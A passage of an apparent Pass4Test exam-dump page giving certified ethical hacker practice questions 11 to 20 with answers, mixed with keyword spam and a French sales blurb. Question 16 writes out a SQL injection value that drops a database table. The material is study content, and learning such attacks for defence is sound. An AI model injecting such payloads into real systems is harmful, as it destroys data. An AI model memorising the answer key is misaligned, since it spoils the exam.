D. Investigate their social networking profiles
Answer: C

EC-COUNCIL examen   312-50v7 examen   312-50v7 examen   312-50v7   312-50v7

NO.11 Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routines to
create or alter SQL commands to gain access to private data or execute commands in the database.
What technique does Jimmy use to compromise a database.?
A. Jimmy can submit user input that executes an operating system command to compromise a target
system
B. Jimmy can gain control of system to flood the target system with requests, preventing legitimate users
from gaining access
C. Jimmy can utilize an incorrect configuration that leads to access with higher-than expected privilege of
the database
D. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate a target
system
Answer: D

certification EC-COUNCIL   312-50v7   312-50v7   312-50v7 examen

NO.12 This type of Port Scanning technique splits TCP header into several packets so that the packet filters
are not able to detect what the packets intends to do.
A. UDP Scanning
B. IP Fragment Scanning
C. Inverse TCP flag scanning
D. ACK flag scanning
Answer: B

certification EC-COUNCIL   312-50v7 examen   312-50v7   312-50v7 examen

NO.13 Which of the following type of scanning utilizes automated process of proactively identifying
vulnerabilities of the computing systems present on a network?
A. Port Scanning
B. Single Scanning
C. External Scanning
D. Vulnerability Scanning
Answer: D

EC-COUNCIL   312-50v7   312-50v7 examen   312-50v7 examen

NO.14 Anonymizer sites access the Internet on your behalf, protecting your personal information from
disclosure. An anonymizer protects all of your computer's identifying information while it surfs for you,
enabling you to remain at least one step removed from the sites you visit.
You can visit Web sites without allowing anyone to gather information on sites visited by you. Services
that provide anonymity disable pop-up windows and cookies, and conceal visitor's IP address.
These services typically use a proxy server to process each HTTP request. When the user requests a
Web page by clicking a hyperlink or typing a URL into their browser, the service retrieves and displays the
information using its own server. The remote server (where the requested Web page resides) receives
information on the anonymous Web surfing service in place of your information.
In which situations would you want to use anonymizer? (Select 3 answers)
A. Increase your Web browsing bandwidth speed by using Anonymizer
B. To protect your privacy and Identity on the Internet
C. To bypass blocking applications that would prevent access to Web sites or parts of sites that you want
to visit.
D. Post negative entries in blogs without revealing your IP identity
Answer: B,C,D

certification EC-COUNCIL   312-50v7   312-50v7

NO.15 Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie
recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co.
Jack tells Jane that there has been a problem with some accounts and asks her to verify her password
with him ''just to double check our records.'' Jane does not suspect anything amiss, and parts with her
password. Jack can now access Brown Co.'s computers with a valid user name and password, to steal
the cookie recipe. What kind of attack is being illustrated here?
A. Reverse Psychology
B. Reverse Engineering
C. Social Engineering
D. Spoofing Identity
E. Faking Identity
Answer: C

EC-COUNCIL   312-50v7 examen   312-50v7 examen   312-50v7

NO.16 The following script shows a simple SQL injection. The script builds an SQL query by concatenating
hard-coded strings together with a string entered by the user: The user is prompted to enter the name of a
city on a Web form. If she enters Chicago, the query assembled by the script looks similar to the following:
SELECT * FROM OrdersTable WHERE ShipCity = 'Chicago'
How will you delete the OrdersTable from the database using SQL Injection?
A. Chicago'; drop table OrdersTable -
B. Delete table'blah'; OrdersTable -
C. EXEC; SELECT * OrdersTable > DROP -
D. cmdshell'; 'del c:\sql\mydb\OrdersTable' //
Answer: A

EC-COUNCIL   312-50v7   certification 312-50v7   312-50v7

NO.17 Lori is a Certified Ethical Hacker as well as a Certified Hacking Forensics Investigator working as an IT
security consultant. Lori has been hired on by Kiley Innovators, a large marketing firm that recently
underwent a string of thefts and corporate espionage incidents. Lori is told that a rival marketing company
came out with an exact duplicate product right before Kiley Innovators was about to release it. The
executive team believes that an employee is leaking information to the rival company. Lori questions all
employees, reviews server logs, and firewall logs; after which she finds nothing. Lori is then given
permission to search through the corporate email system. She searches by email being sent to and sent
from the rival marketing company.
She finds one employee that appears to be sending very large email to this other marketing company,
even though they should have no reason to be communicating with them. Lori tracks down the actual
emails sent and upon opening them, only finds picture files attached to them. These files seem perfectly
harmless, usually containing some kind of joke. Lori decides to use some special software to further
examine the pictures and finds that each one had hidden text that was stored in each picture.
What technique was used by the Kiley Innovators employee to send information to the rival marketing
company?
A. The Kiley Innovators employee used cryptography to hide the information in the emails sent
B. The method used by the employee to hide the information was logical watermarking
C. The employee used steganography to hide information in the picture attachments
D. By using the pictures to hide information, the employee utilized picture fuzzing
Answer: C

EC-COUNCIL   certification 312-50v7   312-50v7   312-50v7   312-50v7 examen

NO.18 What does ICMP (type 11, code 0) denote?
A. Source Quench
B. Destination Unreachable
C. Time Exceeded
D. Unknown Type
Answer: C

EC-COUNCIL   312-50v7   312-50v7   certification 312-50v7

NO.19 TCP SYN Flood attack uses the three-way handshake mechanism.
An attacker at system A sends a SYN packet to victim at system B.
System B sends a SYN/ACK packet to victim A.
As a normal three-way handshake mechanism system A should send an ACK packet to system B,
however, system A does not send an ACK packet to system B. In this case client B is waiting for an ACK
packet from client A.
This status of client B is called _________________
A. "half-closed"
B. "half open"
C. "full-open"
D. "xmas-open"
Answer: B

certification EC-COUNCIL   certification 312-50v7   312-50v7 examen   certification 312-50v7   312-50v7

NO.20 How do you defend against ARP Spoofing? Select three.
A. Use ARPWALL system and block ARP spoofing attacks
B. Tune IDS Sensors to look for large amount of ARP traffic on local subnets
C. Use private VLANS
D. Place static ARP entries on servers, workstation and routers
Answer: A,C,D

certification EC-COUNCIL   certification 312-50v7   312-50v7   certification 312-50v7

Pass4Test a de formations plus nouvelles pour le test EC-COUNCIL 312-50v7. Les experts dans l'industrie IT de Pass4Test profitant leurs expériences et connaissances professionnelles à lancer les Q&As plus chaudes pour faciliter la préparation du test EC-COUNCIL 312-50v7 à tous les candidats qui nous choisissent. L'importance de Certification EC-COUNCIL 312-50v7 est de plus en plus claire, c'est aussi pourquoi il y a de plus en plus de gens qui ont envie de participer ce test. Parmi tous ces candidats, pas mal de gens ont réussi grâce à Pass4Test. Ces feedbacks peuvent bien prouver nos produits essentiels pour votre réussite de test Certification.

订阅：博文 (Atom)